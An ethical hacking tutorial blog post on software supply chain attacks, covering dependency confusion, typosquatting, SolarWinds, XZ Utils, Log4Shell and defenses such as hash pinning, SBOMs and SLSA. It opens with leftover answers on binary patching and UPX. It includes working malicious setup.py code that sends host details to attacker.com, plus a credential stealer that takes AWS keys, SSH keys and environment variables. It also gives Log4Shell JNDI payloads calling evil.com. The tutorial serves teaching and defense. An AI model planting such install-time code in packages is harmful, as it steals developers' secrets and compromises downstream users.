Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source

Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source

leh-banner.jpg

What will I learn

  • What supply chain attacks are and why they represent the most devastating attack class in modern security;
  • Software supply chain -- compromising open-source packages, build systems, and update mechanisms;
  • Dependency confusion -- tricking package managers into installing malicious internal-name packages from public registries;
  • Typosquatting -- publishing malicious packages with names similar to popular libraries;
  • Build system poisoning -- compromising CI/CD pipelines, build servers, and code signing infrastructure;
  • SolarWinds, Log4Shell, and XZ Utils -- detailed case studies of real supply chain attacks that shook the industry;
  • SBOMs and dependency auditing -- understanding what is actually in your software;
  • Defense: dependency pinning, lock files, signature verification, SLSA framework, and private registry hardening.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Understanding of IaC and CI/CD security from Episode 38;
  • Familiarity with package managers (npm, pip, cargo);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate/Advanced

Curriculum (of the Learn Ethical Hacking Series):

Step 1: Ghidra decompiler showed:

void check_pin(char *input) {

if (atoi(input) == 7394) { <-- integer constant visible!

puts("Access granted");

} else {

puts("Access denied");

}

}

The constant 7394 (0x1CE2) is visible as an immediate operand

in: CMP EAX, 0x1ce2 at offset 0x119b

Step 2: Find the conditional jump

0x11a0: JNE 0x11b8 (jump to "denied" if not equal)

JNE opcode: 0x75, relative offset: 0x16

Step 3: Patch -- NOP out the JNE

with open('pin_checker', 'rb') as f:
data = bytearray(f.read())

NOP the 2-byte JNE instruction at file offset 0x11a0

data[0x11a0] = 0x90 # NOP
data[0x11a1] = 0x90 # NOP

with open('pin_checker_patched', 'wb') as f:
f.write(data)

import os
os.chmod('pin_checker_patched', 0o755)

Verification:

./pin_checker_patched 0000 -> "Access granted"

./pin_checker_patched 9999 -> "Access granted"

Any PIN now works because the branch is eliminated


Two things worth noting. First, the integer constant `7394` was directly visible in the decompiler output -- Ghidra shows numeric constants in the comparison, so you can just read the PIN. No dynamic analysis needed. Second, the NOP patch (replacing the conditional jump with two NOP bytes) is the simplest possible binary modification. The program now falls through from the comparison straight into the "granted" path regardless of the comparison result. In real-world DRM cracking this exact technique is used constantly -- find the license check, NOP the branch, done.

**Exercise 3:** UPX packing analysis.

```text
Packed binary analysis:

BEFORE unpacking (Ghidra):
- Sections: UPX0 (0 bytes on disk, large virtual size),
  UPX1 (compressed data), UPX2 (small, metadata)
- Functions detected: 3 (UPX stub only)
- Defined strings: "UPX!", "$Info: This file is packed with
  the UPX executable packer http://upx.sf.net $"
- Decompiler: shows only the decompression routine
- No application logic visible at all

AFTER unpacking (upx -d binary, re-import to Ghidra):
- Sections: .text, .data, .bss, .rodata (normal ELF layout)
- Functions detected: 47
- Defined strings: 83 (passwords, URLs, error messages, file paths)
- Full decompilation of all functions available
- All vulnerability patterns (strcpy, sprintf) now visible

VMProtect vs UPX comparison:
- UPX: compression only. Single layer. Deterministic unpacking.
  upx -d reverses it perfectly. No anti-debug.
- VMProtect: code VIRTUALIZATION. Translates x86 instructions
  to a custom bytecode interpreted by a built-in VM. Each
  protected binary gets a unique VM instruction set. Cannot
  be mechanically unpacked. Requires:
  1. Identify the VM dispatch loop
  2. Map virtual opcodes to their real operations
  3. Reconstruct the original logic from VM traces
  4. Anti-debug: checks IsDebuggerPresent, NtQueryInformation,
     timing checks, hardware breakpoint detection
  5. Integrity checks: CRC/hash of protected sections
  Analysis time: hours to weeks vs seconds for UPX.

The contrast between UPX and VMProtect is the difference between a locked door and a maze. UPX wraps the binary in a compression layer that has a known, deterministic reversal. VMProtect transforms the code itself into something fundamentally different -- a custom language that only the embedded interpreter can execute. If you've ever tried to reverse engineer VMProtect-protected software, you know the feeling of staring at thousands of mov/xor/jmp instructions that are the VM dispatcher, not the actual program logic. It is, to put it mildly, not a fun afternoon ;-)


Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source

Episode 44 covered reverse engineering -- the art of understanding compiled binaries without source code. We went through static analysis with Ghidra (the NSA's free RE framework with its excellent decompiler), dynamic analysis with GDB and pwndbg (watching binaries execute in real time), x86 assembly pattern recognition (the minimum you need to read disassembly productively), string analysis as the highest-value lowest-effort first step, binary patching to modify program behavior at the byte level, and anti-reversing techniques from simple symbol stripping through UPX packing to commercial-grade code virtualization with VMProtect. You can now take an unknown binary, find interesting strings, trace cross-references to the code that uses them, read the decompiler output to understand the logic, verify your understanding dynamically, and identify vulnerability patterns in closed-source software.

Every attack we have covered so far -- all 44 episodes of scanning, exploiting, escalating, pivoting, reverse engineering -- requires the attacker to reach the target. Scan the network. Find the service. Discover the vulnerability. Write the exploit. Gain access. It's an active, adversarial process where the attacker works to break into something that is trying to keep them out.

Supply chain attacks invert this entire model.

Instead of attacking the target, you attack something the target trusts and installs voluntarily. You poison the library they depend on. You compromise the build system that creates their software. You backdoor the update mechanism they run automatically every night. The target installs your malware themselves, believing it is a legitimate update from a trusted source. No scanning. No exploitation. No firewall to bypass. The front door is open because the victim opened it.

This is why supply chain attacks are the most dangerous class in modern security: they weaponize trust itself.

Here we go.

Why the Supply Chain Is the Weakest Link

Modern software is not written from scratch. A typical Node.js web application has 500-1,500 dependencies in its node_modules directory. A Python project with a handful of pip install commands might pull in 30-60 transitive dependencies that the developer never explicitly requested and probably doesn't know exist. A Go project that imports five packages might resolve to forty modules after the dependency graph is fully expanded.

Each of those dependencies is an attack surface. Every one of them was written by someone, maintained by someone, published through some registry, and installed by some package manager. At any point in that chain -- the developer's laptop, the CI/CD pipeline, the package registry, the DNS resolution of the registry, the TLS certificate that authenticates it -- a compromise can inject malicious code that flows downstream to every project that depends on it.

# How many dependencies does YOUR project actually have?

# Node.js:
cd my-project
npm ls --all | wc -l
# Output: 1,247 (typical for a React app)

# Python:
pip install pipdeptree
pipdeptree --warn silence | grep -c "installed"
# Output: 89 (typical for a Django project)

# Go:
go list -m all | wc -l
# Output: 47 (typical for a web server)

# Rust:
cargo tree | wc -l
# Output: 312 (typical for an actix-web project)

Those numbers are the attack surface of your supply chain. 1,247 npm packages means 1,247 maintainer accounts that could be compromised, 1,247 build systems that could be poisoned, 1,247 package versions that could be replaced with malicious ones. You didn't audit any of them. You probably don't know what most of them do. And your application trusts every single one of them with the same permissions your application has.

Dependency Confusion

Dependency confusion (discovered by Alex Birsan, published February 2021) exploits a fundamental ambiguity in how package managers resolve names. Many companies use internal packages with names like company-utils or internal-auth hosted on private registries. If those same names are NOT registered on the public registry (npm, PyPI, RubyGems), an attacker can register them publicly with a higher version number:

# Step 1: Attacker discovers internal package name
# Sources: leaked package.json files, job postings ("experience
# with our internal-analytics-sdk"), error messages in public
# GitHub repos, npm/pip install logs in CI output

# Step 2: Attacker publishes on public PyPI:
# Package name: company-internal-utils
# Version: 99.0.0 (higher than the internal 1.2.3)
# setup.py contains:
# setup.py -- malicious package (dependency confusion PoC)
from setuptools import setup
import subprocess
import socket
import os

# Exfiltrate proof of execution
try:
    hostname = socket.gethostname()
    username = os.getenv('USER', 'unknown')
    cwd = os.getcwd()
    subprocess.Popen([
        'curl', '-s',
        f'https://attacker.com/callback?'
        f'pkg=company-internal-utils&'
        f'host={hostname}&user={username}&cwd={cwd}'
    ])
except Exception:
    pass

setup(
    name='company-internal-utils',
    version='99.0.0',
    description='Internal utilities',
    packages=[],
)
# Step 3: When the company's build system runs:
pip install company-internal-utils
# pip checks PyPI first (or in addition to internal registry)
# finds version 99.0.0 (higher than internal 1.2.3)
# installs the MALICIOUS public package

# The malicious setup.py executes during installation
# Attacker receives callback with hostname, username, working dir

Birsan used this exact technique to achieve code execution inside Apple, Microsoft, PayPal, Tesla, Uber, Shopify, and over 35 other major companies. All from registering packages on public registries. He earned over $130,000 in bug bounties from a single research technique.

The root cause is that pip (and npm, and other package managers) will check public registries even when a private registry is configured, and will prefer the higher version number regardless of which registry it comes from. If you configure pip with both an internal registry and PyPI as a fallback, the fallback can override the internal package.

# VULNERABLE configuration -- pip.conf:
[global]
index-url = https://internal-registry.company.com/simple/
extra-index-url = https://pypi.org/simple/
# pip checks BOTH registries and takes the highest version!

# SAFE configuration -- private registry ONLY for internal packages:
[global]
index-url = https://pypi.org/simple/  # public packages from PyPI
# Internal packages: use --index-url override per-package
# Or: namespace your internal packages (not possible on PyPI,
# but npm supports @company/package-name scoping)

# SAFEST: vendor all dependencies (copy into your repo)
pip download -r requirements.txt -d ./vendor/
# Then install from local directory only:
pip install --no-index --find-links=./vendor/ -r requirements.txt

Typosquatting

Simpler than dependency confusion but disturbingly effective: publish a package with a name similar to a popular one. The attacker is betting on typos:

# Popular packages and their real typosquat examples:
# requests   -> reqeusts, request, requets, requesrs
# lodash     -> loadash, lodahs, lodashs
# colors     -> colour, colorsjs, colrs
# express    -> expres, expresss, exppress
# urllib3    -> urllib, urlib3
# beautifulsoup4 -> beautifulsoup, beautifulsoup3

# The malicious package typically:
# 1. Installs the REAL package as a dependency (so everything works)
# 2. Adds a background process that:
#    - Steals environment variables (API keys, AWS credentials)
#    - Installs a reverse shell
#    - Exfiltrates SSH keys and browser cookies
#    - Mines cryptocurrency

# Real example: event-stream (npm, November 2018)
# Not a typosquat but a MAINTAINER TAKEOVER:
# - Attacker offered to maintain the popular event-stream package
# - Original maintainer transferred ownership (burnt out)
# - Attacker added dependency on "flatmap-stream" (malicious)
# - flatmap-stream contained encrypted payload targeting the
#   Copay Bitcoin wallet application
# - Stole private keys from Copay users who updated
# - 8 million weekly downloads affected
# How a typosquat package steals credentials:
# This runs during pip install (in setup.py)
import os
import json
import urllib.request

data = {}

# Grab AWS credentials
aws_creds = os.path.expanduser('~/.aws/credentials')
if os.path.exists(aws_creds):
    with open(aws_creds) as f:
        data['aws'] = f.read()

# Grab SSH keys
ssh_dir = os.path.expanduser('~/.ssh/')
if os.path.exists(ssh_dir):
    for fname in os.listdir(ssh_dir):
        fpath = os.path.join(ssh_dir, fname)
        if os.path.isfile(fpath):
            with open(fpath) as f:
                data[f'ssh_{fname}'] = f.read()

# Grab environment variables (often contain API keys)
data['env'] = dict(os.environ)

# Exfiltrate
req = urllib.request.Request(
    'https://attacker.com/collect',
    data=json.dumps(data).encode(),
    headers={'Content-Type': 'application/json'}
)
urllib.request.urlopen(req)

That setup.py runs with full user permissions during pip install. No sandbox. No confirmation prompt. No warning. Whatever permissions the developer (or CI/CD service account) has, the malicious setup script has. On a developer laptop, that's SSH keys, AWS credentials, browser cookies, and everything in the home directory. On a CI/CD runner, it might be deployment keys, cloud provider tokens, and access to production infrastructure.

Build System Poisoning -- SolarWinds

The SolarWinds attack (discovered December 2020, attributed to Russian SVR foreign intelligence) is the most sophisticated supply chain compromise ever documented. The attackers didn't compromise a package registry or trick developers into installing something. They compromised the build system itself -- the infrastructure that compiles and signs legitimate software updates:

SolarWinds Orion Attack Chain:

1. Initial access: attackers compromised SolarWinds' internal
   build environment (TeamCity CI/CD servers) sometime in 2019

2. Build process injection: injected a custom build plugin that
   added malicious code during compilation. The malicious code
   (SUNBURST backdoor) was inserted into the Orion.Core.BusinessLayer
   DLL -- a legitimate SolarWinds component

3. Code signing: the modified DLL was compiled and SIGNED with
   SolarWinds' valid code signing certificate. The signature was
   legitimate. The certificate was legitimate. The only thing
   that wasn't legitimate was the extra code inside the DLL.

4. Distribution: SolarWinds distributed the poisoned update
   through their normal update channels. 18,000 organizations
   downloaded and installed it.

5. SUNBURST activation: the backdoor waited 12-14 DAYS after
   installation before activating (to evade sandboxes that run
   samples for hours/days). It communicated via DNS to C2 servers
   using subdomains that encoded victim identification data.

6. Selective targeting: of 18,000 victims, attackers only
   activated secondary payloads (TEARDROP, RAINDROP) on ~100
   high-value targets: US Treasury, Department of Commerce,
   Department of Homeland Security, FireEye, Microsoft.

7. Detection: 9 MONTHS of undetected access. FireEye discovered
   it in December 2020 during investigation of their OWN breach.
   A security company got hacked and only found out because
   attackers stole their red team tools, which triggered an
   internal investigation that eventually traced back to the
   SolarWinds update.

Key lesson: the code was signed. The update was legitimate
according to every verification mechanism that existed.
Certificate pinning wouldn't help -- the certificate was real.
Hash verification wouldn't help -- the hash matched the signed
binary. The BUILD SYSTEM was the point of compromise, and that
meant every downstream defense was bypassed by design.

Think about what that means for your own build pipeline. If an attacker compromises your CI/CD server (your Github Actions runner, your Jenkins master, your GitLab CI worker), they can modify any artifact that pipeline produces. Every Docker image, every npm package, every compiled binary that flows through that pipeline is potentially compromised. And everything downstream -- every customer, every deployment, every server that pulls those artifacts -- trusts them implicitly because they came from "the build system."

The XZ Utils Backdoor (2024)

If SolarWinds was the most sophisticated supply chain attack in terms of technical execution, the XZ Utils backdoor (CVE-2024-3094, discovered March 2024) was the most chilling in terms of social engineering. A nation-state actor spent two years building trust as an open-source contributor before inserting a backdoor:

Timeline of the XZ Utils compromise:

2021: An account called "Jia Tan" starts contributing to XZ Utils
      (liblzma compression library, used by virtually every Linux
      distribution). Small, helpful patches. Bug fixes. Documentation
      improvements. The kind of contributions that make a maintainer
      grateful.

2022: Jia Tan becomes a trusted co-maintainer. The original
      maintainer (Lasse Collin) is a solo developer maintaining
      critical infrastructure in his spare time. He's overworked.
      Jia Tan helps carry the load. Other accounts pressure Collin
      to add Jia Tan as maintainer (these accounts may have been
      sock puppets -- part of the operation).

2023: Jia Tan gains commit access and starts managing release
      tarballs. Trusted enough to cut releases. Two years of
      patient, legitimate contribution.

2024 (February): Jia Tan inserts the backdoor. NOT in the git
      source code -- in the release TARBALL build scripts. The
      tarball (which is what distributions actually package)
      contained obfuscated test files (.lzma compressed blobs)
      that the build system extracted and linked into liblzma.

      The backdoor modified liblzma's IFUNC resolver to intercept
      RSA_public_decrypt in OpenSSH's sshd (which links liblzma
      through systemd). The result: the attacker could authenticate
      to any SSH server running the compromised xz version with a
      specially crafted key. Remote code execution on every affected
      Linux system. Pre-authentication. No credentials needed.

2024 (March 28): Andres Freund, a Microsoft PostgreSQL developer,
      notices SSH logins are 500ms slower than expected. Investigates.
      Profiles the code. Traces the latency to liblzma. Discovers
      the backdoor. Posts to oss-security mailing list.

      500 milliseconds of latency prevented a global compromise.

Affected: xz 5.6.0 and 5.6.1 (released Feb-March 2024)
          Caught before reaching stable releases of most
          major distributions. Fedora 40 beta, Debian testing,
          and some rolling-release distros were affected.

The XZ attack is terrifying because it exploits something that cannot be patched with software: human trust. Lasse Collin trusted Jia Tan because Jia Tan had spent two years earning that trust through real, useful contribitions. The social engineering was patient, sophisticated, and targeted a single point of failure -- an overworked solo maintainer of critical infrastructure. No technical vulnerability was needed. The vulnerability was organizational: critical open-source infrastructure maintained by one person who was desperate for help.

Software Bill of Materials (SBOM)

An SBOM is a complete inventory of every component in your software -- every library, every dependency, every transitive dependency, with version numbers and known vulnerability status. When a new CVE drops, the first question every organization asks is "are we affected?" Without an SBOM, answering that question means searching every codebase, every build artifact, every container image. With an SBOM, it's a database query:

# Generate SBOM with Syft (from Anchore)
syft packages dir:./my-project -o cyclonedx-json > sbom.json

# Generate for a container image
syft packages docker:nginx:latest -o spdx-json > nginx-sbom.json

# Scan SBOM for known vulnerabilities with Grype
grype sbom:sbom.json
# NAME        INSTALLED  FIXED-IN  VULNERABILITY  SEVERITY
# log4j-core  2.14.1     2.17.1    CVE-2021-44228 Critical
# jackson      2.9.8     2.12.7.1  CVE-2022-42003 High
# commons-text 1.9        1.10     CVE-2022-42889 Critical

# Language-specific dependency auditing:
npm audit                    # Node.js
npm audit --json             # machine-readable output
pip-audit                    # Python (pip)
safety check                 # Python (Safety DB)
cargo audit                  # Rust
govulncheck ./...            # Go
bundle audit                 # Ruby
# Continuous monitoring in CI/CD:
# GitHub: Dependabot (built-in, free)
# GitLab: Dependency Scanning (built-in)
# Third-party: Snyk, Renovate, Socket.dev

# Example GitHub Actions workflow for dependency scanning:
# .github/workflows/security.yml
# name: Dependency Audit
# on: [push, pull_request]
# jobs:
#   audit:
#     runs-on: ubuntu-latest
#     steps:
#       - uses: actions/checkout@v4
#       - run: npm ci
#       - run: npm audit --audit-level=high
#       - run: npx better-npm-audit audit

SBOMs answer the question "what is in my software?" which is the prerequisite for answering "am I affected?" When Log4Shell dropped, organizations with SBOMs could identify affected systems in hours. Organizations without SBOMs spent weeks searching their infrastructure, and many never found all instances because Log4j was buried three or four levels deep in transitive dependency chains that no human had ever examined.

Case Study: Log4Shell (CVE-2021-44228)

Log4Shell deserves its own section because it is the single best illustration of how transitive dependencies create supply chain risk at scale:

Log4Shell (CVE-2021-44228) -- December 2021

Vulnerability: JNDI lookup feature in Apache Log4j 2.x
When Log4j processes a log message containing ${jndi:ldap://...},
it performs a JNDI (Java Naming and Directory Interface) lookup
to the specified server. That server can respond with a Java
class that Log4j downloads and EXECUTES.

Attack: inject ${jndi:ldap://evil.com/payload} into ANY field
that gets logged. HTTP headers, form fields, user agent strings,
API parameters, chat messages, search queries -- anything that
passes through Log4j's message formatting.

Example attack vectors:
  User-Agent: ${jndi:ldap://evil.com/a}
  X-Forwarded-For: ${jndi:ldap://evil.com/a}
  Search query: ${jndi:ldap://evil.com/a}
  Chat message: ${jndi:ldap://evil.com/a}
  Even Minecraft server chat: type the JNDI string in chat,
  the server logs it, Log4j resolves it, code execution.

Blast radius: Log4j is used by virtually every Java application
and many non-Java applications (via JVM-based tools). Enterprise
software, cloud services (AWS, Azure, GCP all had affected
services), Minecraft, Apache Solr, Apache Struts, VMware,
Cisco, IBM -- the list is essentially "every company that
uses Java." Estimated 3+ billion devices affected.

Supply chain angle: most affected applications did NOT directly
depend on Log4j. They used Spring Boot, which used Spring
Framework, which used some logging abstraction, which used
Log4j. Or they used Elasticsearch, which used Log4j internally.
The developers of the affected applications had never written
"import org.apache.logging.log4j" in their code. It was 3-4
levels deep in the dependency tree. They didn't know it was
there until CVE-2021-44228 was published and the internet
caught fire.

Timeline:
Nov 24, 2021: Reported to Apache by Alibaba Cloud security
Dec 9, 2021:  Public disclosure + mass exploitation begins
Dec 10: Log4j 2.15.0 released (incomplete fix)
Dec 13: Log4j 2.16.0 released (better fix)
Dec 17: Log4j 2.17.0 released (complete fix)
Dec 28: Log4j 2.17.1 released (yet another bypass patched)
Four patch releases in 18 days as bypasses kept appearing.

Defense: Securing the Supply Chain

Having said that, supply chain attacks are not unstoppable. The defenses exist. They are just not universally adopted, which is why these attacks keep working:

# 1. Pin dependencies to exact versions + hash verification
# requirements.txt (Python):
requests==2.31.0 \
    --hash=sha256:58cd2187c01e70e6e26505bca751...
cryptography==41.0.7 \
    --hash=sha256:13f93ce9bea8016c5e2...

# Install with hash enforcement:
pip install --require-hashes -r requirements.txt
# If ANY hash doesn't match, installation FAILS

# package-lock.json (npm) already pins + hashes by default
# Use npm ci (not npm install) in CI/CD:
npm ci
# Installs exactly what's in the lock file, fails if changed
# 2. Vendor dependencies (copy into your repo)
# Go makes this easy:
go mod vendor
# All dependencies are now in ./vendor/ inside your repo
# No runtime dependency on external registries
# Build with: go build -mod=vendor ./...

# Python equivalent:
pip download -r requirements.txt -d ./vendor/
pip install --no-index --find-links=./vendor/ -r requirements.txt

# This eliminates the registry as an attack vector entirely
# Tradeoff: repo size increases, updates are manual
# 3. SLSA framework (Supply-chain Levels for Software Artifacts)
# https://slsa.dev/
#
# Level 1: Build process documented
# Level 2: Build process automated, generates provenance
#          (a signed statement of: who built it, from what source,
#          using what build system, producing what output)
# Level 3: Build process hardened (hermetic -- no network access
#          during build, reproducible -- same source = same output)
# Level 4: Two-person review for ALL changes

# Verify SLSA provenance for a container image:
cosign verify-attestation \
    --type slsaprovenance \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    myregistry.com/myimage:v1.0

# npm package provenance (available since 2023):
npm audit signatures
# Checks that packages were built by their claimed CI/CD systems
# 4. Private registry with upstream mirroring and approval
# Artifactory / Nexus / Verdaccio (npm) / DevPI (Python)
#
# Policy: new packages require security review before approval
# Only reviewed packages are available to build systems
# Mirrors approved versions from upstream registries
# Blocks direct access to public registries from CI/CD

# 5. Code signing and provenance
# Sigstore (cosign) for container images:
cosign sign --key cosign.key myregistry.com/myimage:v1.0
cosign verify --key cosign.pub myregistry.com/myimage:v1.0

# 6. Dependency review on pull requests
# GitHub: Dependency Review Action
# Blocks PRs that introduce known-vulnerable dependencies
# Shows diff of dependency changes in every PR

The SLSA framework is particularly important because it addresses the SolarWinds-style attack directly. At SLSA Level 3, the build process is hermetic (no network access during build, so a compromised build server can't download additional malicious code) and reproducible (building from the same source always produces bit-identical output, so a backdoor injected during build would produce a different hash than an independent rebuild from the same source). SolarWinds at SLSA Level 3 would have been detectable: rebuild from source, compare hashes, notice they don't match, investigate.

The AI Slop Connection

AI code generators have created an entirely new supply chain attack vector. When a developer asks an AI to help with a task and the AI suggests pip install obscure-package-name, how does the developer verify that package is legitimate? They probably don't. They paste the command, install the package, and move on.

Worse, AI models sometimes hallucinate package names -- they suggest packages that don't exist. Researchers have demonstrated that you can register the hallucinated package names on PyPI and npm, and real developers will install them because an AI told them to. This is dependency confusion by proxy, with the AI as the unwitting accomplice.

And on the offensive side, AI is being used to generate malicious packages at scale. An attacker can use AI to create hundreds of typosquatted packages with legitimate-looking README files, documentation, changelogs, and even test suites. The packages look real because they were generated by the same models that generate real packages. Automated quality checks (does this package have a README? does it have tests? is the description coherent?) are defeated because AI generates all of those artifacts trivially.

The supply chain was already fragile before AI. AI is making it more fragile in two ways simultaneously: increasing the volume of dependencies (AI suggests adding packages for trivial functionality that a developer would have written in 10 lines of code) and increasing the sophistication of attacks (AI-generated malicious packages that pass casual inspection and automated quality gates).

What Comes Next

We've now completed a massive arc of the series. From episode 1 through episode 45, we've covered the full technical spectrum: reconnaissance and scanning, web application attacks, network exploitation, privilege escalation, lateral movement, cloud and infrastructure attacks, exploitation frameworks, custom binary exploitation with modern mitigation bypasses, reverse engineering, and now supply chain attacks. These are the how of hacking -- the techniques, the tools, the methods.

The next phase of this series shifts to a fundamentally different question. The techniques we've covered so far assume a technical attack surface -- a buffer overflow, a SQL injection, a misconfigured cloud instance. But the vast majority of successful breaches don't start with a technical exploit. They start with a human making a mistake. Clicking a link. Reusing a password. Plugging in a USB drive. Trusting a phone call. The human element is not just another attack surface -- it's the attack surface that every technical defense ultimately depends on. And understanding why decades of security awareness training have failed to fix it requires looking at security through an entirely different lens than the one we've been using.

Exercises

Exercise 1: Audit the dependencies of a project you work on. Use npm audit, pip-audit, or cargo audit depending on the language. Document: (a) total number of direct dependencies, (b) total number of transitive dependencies, (c) number of known vulnerabilities found, (d) severity breakdown (critical/high/medium/low). If any critical vulnerabilities exist, trace the dependency chain to understand how the vulnerable package entered your project. Save to ~/lab-notes/dependency-audit.md.

Exercise 2: Research the XZ Utils backdoor (CVE-2024-3094) in depth. Document: (a) the social engineering timeline -- how "Jia Tan" built trust over two years, (b) the technical mechanism -- how the backdoor was hidden in the build system and release tarballs rather than the git source, (c) how it was discovered -- Andres Freund's 500ms latency observation, (d) which Linux distributions were affected and which caught it in time, (e) what supply chain defenses (SLSA provenance, reproducible builds, tarball-vs-git comparison) would have detected it earlier. Save to ~/lab-notes/xz-backdoor-analysis.md.

Exercise 3: Set up a dependency confusion lab. Create a private Python package with a unique name (e.g., mycompany-testpkg-RANDOMSTRING). Configure pip with a local directory as the primary index and TestPyPI (https://test.pypi.org/) as the extra index. Observe: does pip prefer the local version or the public version when the public version has a higher version number? Register the same package name on TestPyPI with version 99.0.0 and test again. Document pip's resolution behavior and how to configure pip to prevent this confusion. Use TestPyPI only -- do NOT publish to real PyPI. Save to ~/lab-notes/dependency-confusion-lab.md.


Bedankt en tot de volgende keer!

@scipio



0
0
0.000
0 comments